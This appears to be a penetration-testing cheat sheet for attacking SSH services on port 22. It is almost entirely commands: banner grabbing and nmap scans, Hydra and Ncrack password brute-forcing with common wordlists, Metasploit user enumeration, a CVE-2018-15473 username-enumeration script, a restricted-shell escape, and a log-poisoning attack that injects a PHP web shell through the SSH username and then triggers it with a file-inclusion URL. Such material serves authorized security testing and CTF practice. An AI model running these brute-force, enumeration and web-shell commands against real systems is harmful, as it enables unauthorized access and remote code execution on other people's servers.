SSH 22
Checklist
Check for SSH version vulnerabilities
User enumeration possibilities
Verify if host keys match other systems
Test if password login is enabled (prompts for a password)
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar
Commands and Tools
Banner Grabbing:
nc -vn <target_ip> 22 nmap -sV --script=ssh-hostkey -p22 <target_ip>
Nmap SSH Scripts:
ls -lh /usr/share/nmap/scripts/ssh sudo nmap <target_ip> -p 22 -sV --script=ssh-hostkey
Key Scanning:
ssh-keyscan -t rsa -p 22 <target_ip>
Brute Forcing
Hydra Brute Force:
sudo hydra -l <username> -P rockyou.txt -v <target_ip> ssh -s 22 -t 4
Good password lists:
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
NCRACK:
ncrack -p 22 --user <username> -P ./passwords.txt <target_ip>
Private Keys
Using Found Private Keys:
sudo chmod 600 <key_file> ssh -i <key_file> <user>@<target_ip>
Generate Private Keys:
ssh-keygen -t rsa
System Administration
Check SSH Status:
sudo service ssh status
Start/Stop/Restart SSH Server:
sudo service ssh start sudo service ssh stop sudo service ssh restart
Verify SSH Process and Ports:
netstat -tulpn | grep sshd
Metasploit Modules
Enumerate Users:
use auxiliary/ssh/ssh_enumusers set rhost <target_ip> set rport 22 set threads 1 set threshold 5 run
Exploitation
SSH Log Poisoning (Requires RCE Vulnerability):
Log injection:
ssh ''@<target_ip>
Injected URL:
http://<target_ip>/search.php?id=/var/log/auth.log&cmd=<your_command>
Remote Code Execution (RCE) via Username:
ssh '<?php system($_GET["cmd"]);?>'@<target_ip>
Escape Restricted Shell (Rbash):
sudo ssh <user>@<target_ip> -t "bash --noprofile"
Vulnerable Versions
OpenSSH < 7.7 (CVE-2018-15473):
Enumerate usernames:
python ssh-username-enum.py <target_ip> -w usernames.txt
Additional Notes
Forcing Specific Authentication Method:
ssh -v <target_ip> -o PreferredAuthentications=password
Analyze Debug Output:
ssh -v <username>@<target_ip>
Last updated